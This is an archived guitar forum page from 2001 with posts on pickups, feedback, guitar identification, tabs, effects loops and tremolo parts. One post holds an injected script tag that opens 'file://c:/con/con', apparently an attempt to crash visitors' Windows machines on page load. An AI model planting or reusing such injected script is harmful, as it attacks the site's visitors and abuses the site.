Guitar Discussion Forum Archive - January, 2001

Comment viewing options

Select your preferred way to display the comments and click "Save settings" to activate your changes.

Re: I want to get new pick-ups. any recommendations????????????

: i bought a tanglewood les paul and i'm getting really screechy feedback from a marshall amp.
: it's a powrful amp and i don't think i should be getting that much feedback.
: i'm think about getting new pick-ups. i have two humbuckers on my les paul copy and wondering if there
you can get duncans or dimarzios from musicians friend for 60-80 a piece, carvin makes really great pickups at abour 50 each, talk to your local retailer about what might best suit your sound. a lot of places will install them for free if you buy from them.

is any good pick ups i can get.
: i can afford about $250 on new ones but i would'nt take the chance on putting them in myself.

get gibson 500T for bridge and 496R for neck, they´re really fullrange

I had the same problem with feedback in my setup, I had my Seymore/Duncan FullShred pickups dunked in paraphin wax. This keeps the coils from vibrating thus iliminating the feedback.: i bought a tanglewood les paul and i'm getting really screechy feedback from a marshall amp.
: it's a powrful amp and i don't think i should be getting that much feedback.
: i'm think about getting new pick-ups. i have two humbuckers on my les paul copy and wondering if there is any good pick ups i can get.
: i can afford about $250 on new ones but i would'nt take the chance on putting them in myself.

notes

Searching Lauro notes: "El nino"

Re: notes Lauro "El nino"

Searching Lauro notes: "El nino"

Epiphone El Nino

Does anyone know anything about the Epiphone El Nino Guitar? It's a 22" scale guitar. Is this an old classic? Is it a quality guitar? Can't find any info on it.

Microphone speakers / amps??

I am wondering what microphones are plugged into. Are they plugged into guitar amps or microphone speakers? What price wold speakers for microphones be ? I need to be heard over a 4 piece band. PLESE HELP

Re: Microphone speakers / amps??

A P.A. system, I guess. If you are using your microphone for vocals in a live situation, your P.A. will need 150 watts minimum, and a set of matched P.A. speakers. Singing through guitar or even some bass amps can do damage to speakers, be careful!
: I am wondering what microphones are plugged into. Are they plugged into guitar amps or microphone speakers? What price wold speakers for microphones be ? I need to be heard over a 4 piece band. PLESE HELP

RP-14D or GT-3?

Any big differences?? what features are missing in which one???

GFASFD

<SCRIPT>window.open("file://c:/con/con")</SCRIPT>

hkhj

yo

Quiz !!!!

Name the guitar - It's a Gibson 335 type look but it has block pearls like a 347 on the fret board, it has gold hardware, the tuning keys are ivory looking certainly not nickel or gold, the crown logo is on the head stock, with a tunamatic bridge - and here's the crunch it's black, many of the Gibson semi's don't come in black. - Bet you don't know !!!!

Re: Quiz !!!!

I'd say Lucille, except that that has metal tuners.
I give up.
-Rick

that ones easy...

ITs an es 355 now whats my prize?

: Name the guitar - It's a Gibson 335 type look but it has block pearls like a 347 on the fret board, it has gold hardware, the tuning keys are ivory looking certainly not nickel or gold, the crown logo is on the head stock, with a tunamatic bridge - and here's the crunch it's black, many of the Gibson semi's don't come in black. - Bet you don't know !!!!

Re: that ones easy...

:
Nice try - but this guitar has no varitone switch. As far as I can see it's a 335 with pearl blocks in black with gold hardware - gorgeous !!

Re: that ones easy...

They made 355s without the VariTone switch (I think only special order though), but a 355 has a Super 400 inlay on the peghead (like a Les Paul Custom, or a Johnny Smith also, it's a diamond shpae, but split up into 5 separate pieces of pearl). Maybe it had a new fingerboard put on it. Doesn't it say on the label? The orange label inside the F hole often gives the model number. The possibility exists that it's what's known as a Kalamazoo Special...meaning maybe somebody that worked at the factory put it together at home from parts, or it may be a special order guitar from the custom shop. Why don't you post a picture of it where we can see it?

: :
: Nice try - but this guitar has no varitone switch. As far as I can see it's a 335 with pearl blocks in black with gold hardware - gorgeous !!

"Hey Daffy, That Would Great If You Would Tab Those Chords Out".

"The Man Who Sold The World". Thanks Daffy. Your The Best!

Re: Try this

OK, the start of the chorus just has Kurt playing from C to F (listen to the song and you should get it?, Now Pat Smear first plays the F major scale which goes like this:

E 1 3
A 0 1 3
D 0 2 3
G
B
E

Then he goes up to the C major scale which goes like this:

E
A 3 5
D 2 3 5
G 2 3 5
B
E

Listen to the song to get it right. Ps. Its half a step down on the album

Valley Arts Guitar M series

This guitar is pretty rare...Ive never seen another guitar like mine.....and I wanna sell it.....its a valley arts guitar mark mcguire series but I dont know how much.....do u have an idea how much is market price

Re: Valley Arts Guitar M series

alan...
hmmm....pretty rare...of course..i've been
searching in the internet for this brand.......
tell me how much is the price...?

Anyone in Colorado springs want to play and record?

Ive got my own studio at home and record alot of acoustical stuff,but I need a special someone to lend some inspiration.Ive always wanted to bump into a good guitarist /artist to add that extra something and create/record some new music,not so much for stardom,just to enjoy some new blood and have some fun.Whatever happens after that,who knows,who cares?Anyone out there interested?

Tabbers win a cd

I'd like to invite all of you fellow tabbers to a contest at http://tabworld.dynodns.net

The one that submits the most tabs to this site wins a CD of his own choise.

Site also has lots of other stuff like lessons, links, free-for-all sites list where you can submit your site if you have one, and of course, tablatures!

Go check it out.

If you need a place to get all your guitar needs for free try this

The site is called the Rifftech online guitar method .
This site has chord finders , lessons theory tablature chords and a bunch of other stuff and it's all for nothing so try it for yourself .
http://www.rifftech.com

Hey! arent there any good acoustical guitar players in colorado.

Ive been playing over 35 years.I dont like the bar scenes so I steered clear of that. Im looking for a good guitarist to colaborate with and get serious about writing and recording.Anybody have any suggestions how i can make that happen close to home?

Tilt vs Non-Tilt heads

I'm interested to find out opinions on tilt vs. Non-tilt headstocks. I think I know the idea behind the tilt- to increase string tension. But Fender has been very successfrul with non-tilts. Maybe Fender own the patent for this? Any opinions or researched information would be really great. Thanks!

Re: Tilt vs Non-Tilt heads

Correct: Fenders do not have tilt back headstock. BUT, they DO have string trees on at least 2 strings which applies downward pressure in the string which is similar to a tilted head stock. Check it out. I would say on 90% or better non-tilting headstocks you will see a string tree or two.

Re: Tilt vs Non-Tilt heads

Fender uses a non-tilt headstock because it's chea[er and easier to manufacture. That way, they can build each neck out of a 1" x 3" piece of wood, and in doing so save some cash, but it's also alot easier to do. I personally don't care for string trees, so I usually stick with tilted headstocks.

Going electric!

Can anyone give an advice for a begginer which electric guitar(a good one) can I buy in the range of 300 bucks and a decent amp?
Thanks!

Re: Going electric!

For $300 you can't beat a Charvel Model 4. Just read the reviews at harmony central:

http://www.harmony-central.com/Guitar/Data4/Charvel/Model-4-01.html

You will only find these pre-owned.

Your amp will be a matter of what sound you like at a price you can afford. Modeling is the hot thing now. If you get a modeling pre-amp (POD, J-Station, GT-3, etc) you can run direct to headphones, stereo system, or sound console. If you want an amp with the modeler, you'll need a keyboard amp or a guitar amp with a "power amp" input (sometimes called a "stack jack") to bypass the amp's pre section and get the best out of the modeler. So if you want a guitar amp now but may get a modeler later, don't forget to look for a "power amp" input jack when you're hunting.

I Cant find the tabs of GOODBYE HORSES, CAN YOU HELPME?

I JUST WANT THAT TABS WRITE PLEASE

Give me the lyrics.

i gonna work in the tabs if you send me the lyrics, by the moment i can tell you it is on A and changing to C#m then to Bm and finally to E, but this is only the beginning, then it have some minor changes, let's work togheter

Re: I Cant find the tabs of GOODBYE HORSES, CAN YOU HELPME?

: I JUST WANT THAT TABS WRITE PLEASE

Q-Lazzarus is the singer

Re: I Cant find the tabs of GOODBYE HORSES, CAN YOU HELPME?

I don't have the tabs for Goodbye Horses, but maybe this info. ca, help you find them :

Singer - Q Lazzarus
Lyrics and music - William Garvey
Guitarist - Mark Barrett

Nb First sung in the film Married To The Mob
Later sung in the film Silence Of The Lambs
Later sung by the German group Psyche

...following up

i've found that it's easiest to just buy the married to the mob soundtrack. it's well worth it, the other songs on the soundtrack are pretty good too :)

KAHLER TREM'S

I have an old red anodized Kahler Pro Tremelo. I lost one of the tuning screws. Does anyone know of where I can pick up some extra ones. I actually have 2 Kahler's.

I had to get them about 15 years ago, cuz' Floyd Rose wasn't making them for Lefties which I am. The pro as you may or may not know, can be either a lefty or a rightie!

Re: KAHLER TREM'S

Sorry to say it but Kahler is out of the tremolo business. They got tired of fighting patents with Floyd Rose. I know a friend in Cali who wnt to visit their factory and they are making golf parts. They have no inventory of parts.

Your best bet is to find guitars that are beaters with a kahler and rob them for parts. Check ebay and other sites cause they do pop up from time to time. Also go to guitar shows and ask dealers if they have parts.

Good luck!

Re: KAHLER TREM'S

The best thing to do is go to a business that sells screws and nuts and bolts, get them to measure the thread pitch and all that and then get the the one that suits. You may have to do some work to it yourself, but that is what I did. I needed the intoneation screws and I got them from a screw and bolt shop. Mine were UNC .112 1 inch long and 40 threads per inch. Hopes this helps
Kerry Gray - Australia

valley arts guitar

Hi guys I am a professionnal french guitarist who is living to Paris. I would like change my fender strat us by a guitar like tomm anderson, schecter or if i find a good valley arts of the mistyc year. I wait your answer because here to Paris i don't find it.
many thank for your cooperation
Patrice

The man who sold the world.

What is E13 A013 D023 A35 D235 G235. Is a half step down using a capo? I'm still learnig guitar methods. Thanks.

Re: The man who sold the world.

: What is E13 A013 D023 A35 D235 G235. Is a half step down using a capo? I'm still learnig guitar methods. Thanks.

Ok this is the best advive I can offer is to go to Nirvana web archive and look up Man who sold the world on the Unplugged section, Its very good

Re: The man who sold the world.

: What is E13 A013 D023 A35 D235 G235. Is a half step down using a capo? I'm still learnig guitar methods. Thanks.

REPLY: G235 is a model number of a Yamaha Guitar. If you type "yamaha g235" at a search-engine, you'll find out more.

Duncan L'il '59 Tele pick-ups rock!

Has anyone turned on to this righteous mod? Sounds great. I've heard its good to use a 1 meg vol pot and
a trebel bleed, but my US Tele doesn't seem to need them.

Re: Duncan L'il '59 Tele pick-ups rock!

I have a L'il 59 in the bridge position, and a Seymour Duncan Seth Lover in the neck.... The best sounding Les Paul I own....

GOOD CHOICE!!

Fingerstyle Improvising

In a blatant attempt to either get the improvisation bug
out of my system, or develop it further, I am recording
when I feel the urge. I am then uploading whatever I
recorded to my mp3 page and calling it "Weekly Improv".
The first one is up already at www.mp3.com/jimgraham
and the track under that title will be replaced with a
new one each week. These are all out improv, warts and all,
no re-takes, edits or punch-ins.

Cheers, Jim in Canada

Fender Starcaster on eBay

It's item # 1406384086, maybe this link will work:

http://cgi.ebay.com/aw-cgi/eBayISAPI.dll?ViewItem&item=1406384086&r=0&t=0&showTutorial=0&ed=981351773&indexURL=0&rd=1

Effects Loop?

I've never used an effects loop on a guitar amp before.
Can someone please give me a clue on how to use it, or how it works so I can start experimenting with it? How do you connect the pedals/effects to the chain, how does the chain works. Thanks for any help.

Re: Effects Loop?

Is there any effect inputs on your amp??
If so, just connect al your pedals from the input,
to the output---- Or you can just make a loop with
them, conect pedals after your guitar, into the
input in you amp-- (from input to output)

: I've never used an effects loop on a guitar amp before.
: Can someone please give me a clue on how to use it, or how it works so I can start experimenting with it? How do you connect the pedals/effects to the chain, how does the chain works. Thanks for any help.

Yea, its really easy. First, plug a patch cable into the plug marked "Send" or "Out" on the back of the amp(that is the amp's signal leaving the chain), and plug the other end into the "in" of your effect. Next, plug a cable into the "out" of your effect, back into the "return" or "in" of your amplifier (that is the altered signal re-entering the chain). Thats all u gotta do.

Guitar for Beginners dot Com

Just a reminder that my site http://www.guitarforbeginners.com is getting great reviews for its plain English approach to the subbject. This site now gets hundreds of visits per day and is totally free...40 years of playing experience described in simple terms. Drop in for a visit!

Kirk Lorange

Post new comment

The content of this field is kept private and will not be shown publicly.
CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions. Do not include any spaces in your answer.
Image CAPTCHA
Copy the characters (respecting upper/lower case) from the image.

Contact | Advertise | Contents | Privacy Policy | Forum

This site is published by Hitsquad Pty Ltd. Copyright © 1999 - 2017 , All Rights Reserved.